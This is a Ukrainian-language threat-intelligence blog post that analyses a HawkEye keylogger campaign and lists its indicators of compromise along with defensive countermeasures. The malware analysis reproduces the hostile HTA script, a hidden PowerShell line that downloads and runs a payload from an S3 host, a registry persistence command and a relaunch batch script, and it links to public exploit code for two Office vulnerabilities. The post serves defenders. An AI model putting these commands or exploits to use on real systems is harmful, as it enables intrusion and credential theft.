IOC_HawkEye_110418

Доброго вечора, панове.

 

Візьміть до уваги. Нетипова схема доставки.

Вчора було зафіксовано спроби доставки #HawkEye (keylogger).

Зразки взяли у James_inthe_box та DissectMalware

Цей тип шкідливого коду застосовується для перехоплення вводу з клавіатури, відтак крадіжки облікових даних.

Рівень загрози – середній, а для тих, хто уважно читає наші поради – низький.

 

Наполегливо рекомендуємо вам перевірити реакцію ваших систем захисту на застосування PoC вразливостей які були використані:

https://github.com/bhdresh/CVE-2017-0199

https://github.com/Ridter/CVE-2017-11882

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload—powershell-wget—execute

https://gist.github.com/Voraka/f66b19e2f4c1edbb76dcf67ba82731d2

 

Трохи аналітики:

  • Приманки та payload розміщені на серверах Amazon AWS (білий список для 90% URL-фільтрів)
  • Початковий .docx файл містить в одному із ресурсних .xml посилання на .rtf з вразливістю редактору формул
  • Вразливість редактору формул застосовується для завантаження та виконання .hta файлу
  • .hta містить інструкції для PowerShell, який нарешті завантажує основну частину
  • Основна частина зберігається на диск у Windows\Temp (не користувацька змінна оточення %temp%)
  • .hta чітко регламентує ім’я та шлях за яким буде збережена основна частина
  • Закріплення через HKCU але не Run, а WinNT\Load
  • Winword не генерує дочірніх процесів
  • Виклик powershell від імені mshta.exe
  • Не потребує прав Адміністратора
  • Основне тіло детектується ENS по DAT та GTI

Процес інфікування:


Схема атаки:

Email Attach (.DOCX) > OLE (17-0199) > GET .RTF > EQUENETD (17-11882) > 
HTA > PowerShell > GET payload > Windows\temp\shell.exe

 

Маркери IOC:

#1DOCX файл що містить посилання на RTF у xml:

SHA-256        93f29c160c9ead39ebfdc2ba17206ffeb02f0799253e500084b924f74518a68a
File name   Transfer Slip.docx (MS Word 2007 Document)
File size      12.52 KB

#2RTF файл що завантажується при відкритті попереднього DOCX:

SHA-256    1eb959c96b50de38189117ec78f4bf0bfb1c88427b44878b9f8647e2219ff8fd
File name   Zubyxxxx.doc (RTF)
File size      8.39 KB

#3HTA файл який завантажується при обробці попереднього RTF:

SHA-256    70629aadd17c9ff9c816f016a53cb99eaa43e9f91b9d66601cc4f983587c5fe2
File name   zubyxxx.hta
File size      327 B

#4Основна частина яка звантажуєтеся засобами powershell при обробці HTA файлу

SHA-256        9dbd5e1f540172ffc3a935902ca30a7f7826b1893a203333121ce312f94cb0a3
File name   unzubyxxx.exe >> windows/temp/shell.exe
File size      689.07 KB

#5Модуль основної частини що записується після активації попереднього файлу

SHA-256        36187849e720c376f2b3898cc5d4ae3188f7745be07391a66df080889d4ee12f
File name   .exe
File size      502.5 KB

 

Мережеві IOC:

Компоненти атаки завантажуються з серверів Amazon AWS:

(Увага! Станом на 12/04 посилання досі активні!)

h11p:\ s3.amazonaws{.} com/rewqqq/Zubyxxxx.doc
h11ps:\ s3.amazonaws{.} com/rewqqq/drss/zubyxxx.hta
h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe

Трафік скомпрометованої системи – перевірка Public IP:

104.16.17.96      whatismyipaddress{.} com        GET / HTTP/1.1

Трафік процесів після закріплення:

.exe                49553        104.16.17.96      80        CLOSE_WAIT                                                                             
.exe                49557        159.8.9.177        587        ESTABLISHED                                                                            
svchost.exe         49554        93.184.220.29    80        ESTABLISHED                                                                            
svchost.exe         49555        104.31.74.124    80        ESTABLISHED                                                                            
svchost.exe         49556        178.18.231.96    80        ESTABLISHED                                                                            
WINWORD.EXE         49546        52.216.100.181   80        CLOSE_WAIT   

 

Активність по процесам:

Коли жертва відкриває початковий DOCX файл, спрацьовує вразливість 17-0199.

Процес Winword відкриває з’єднання із Amazon AWS і намагається завантажити RTF файл.

Посилання на другий файл у компоненті document.xml.rels:

<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>

<…

Target=”h11p:\ s3.amazonaws{.} com/rewqqq/Zubyxxxx.doc” TargetMode=”External”/><Relationship Id=”rId4″

</Relationships>

Щойно починається обробка другого документу – через вразливість редактору формул відбувається завантаження інструкцій у вигляді HTA файлу (html application):

"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Windows\SysWOW64\mshta.exe h11ps:\ s3.amazonaws{.} com/rewqqq/drss/zubyxxx.hta

Зміст zubyxxx.hta:

 a=new ActiveXObject(“WScript.Shell”);

a.run(‘%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).

DownloadFile(\’h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe\’, \’c:/windows/temp/shell.exe\’); c:/windows/temp/shell.exe’, 0);window.close();

Обробка HTA призводить до завантаження та запуску основної частини засобами PowerShell:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).
DownloadFile('h11ps:\ s3.amazonaws{.} com/rewqqq/drss/unzubyxxx.exe', 'c:/windows/temp/shell.exe'); c:/windows/temp/shell.exe
"C:\windows\temp\shell.exe"

Після запуску основної частини проходить закріплення через HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load

C:\Windows\SysWOW64\cmd.exe reg  add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" 
/v Load /t REG_SZ /d "C:\tmp\FolderN\name.exe.lnk" /f                       

Зміст ярлика name.exe.LNK:

C:\Users\operator\AppData\Local\Temp\FolderN\name.exe

Основна частина видобуває менший модуль, який залишається стежити за активністю користувача:

"C:\Users\operator\AppData\Local\Temp\tmp.exe"
"C:\tmp\.exe"

Збір інформації через vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\tmp\holdermail.txt"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\tmp\holderwb.txt"

Перезапуск основного модулю через задані проміжки часу через .bat

C:\Windows\SysWOW64\cmd.exe cmd /c C:\Users\operator\AppData\Local\Temp\FolderN\name.exe.bat
timeout  /t 300

Зміст name.exe.bat

:_Start

timeout /t 300

tasklist /nh /fi “imagename eq .exe” | find /i “.exe” >nul && (

Goto _Start

) || (

Start /W “” “C:\Users\operator\AppData\Local\Temp\FolderN\name.exe”

Goto _Start

)

 

Висновки:

  1. Доволі складна та заплутана схема, проте для тих, хто не вжив належних заходів (див. нижче) може становити реальну загрозу
  2. Нестандартні шляхи запису та розпаковки – спроба обійти AppLocker, Software Restriction Policy
  3. Елементи атаки розміщені на довіреному для більшості ресурсі
  4. Ланка (docx > rtf > hta) дозволяє маніпулювати змістом проміжних файлів
  5. На системах де змінна оточення %temp% нестандартна – закріплення буде відбуватися із помилками
  6. Чим заплутаніша схема доставки ти більше ймовірність її поламати якщо запровадити контрзаходи, які ми вже не раз розглядали
  7. До запису основної частини на диск та її запуску (крок виконання powershell) можна 9-ма різними способами захистити систему (див. нижче)

 

Контрзаходи:

  • Перевірити журнали обладнання на наявність спроб комунікації із s3.amazonaws{.} com/rewqqq
  • Розгортання оновлень пакету MS Office, особливо виправлень для 17-0199 та 17-11882
  • Заборонити мережевий трафік для додатків MS Office – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Заборонити запуск редактору формул – GPO або користувацьке правило Access Protection (McAfee ENS)
  • Або заборона запуску дочірніх процесів для редактору формул користувацьке правило Access Protection (McAfee ENS)
  • Заборонити мережевий трафік для mshta.exe та powershell.exe (по аналогії з варіант1)
  • Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Контроль над викликами PowerShell – вбудовані можливості McAfee ENS (сигнатури Exploit Prevention)
  • Заборона створення та зчитування/запуску *.EXE файлів з каталогів профілю C:\Users\**\
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталозі C:\Windows\Temp\**
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

Tags: , , , , , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: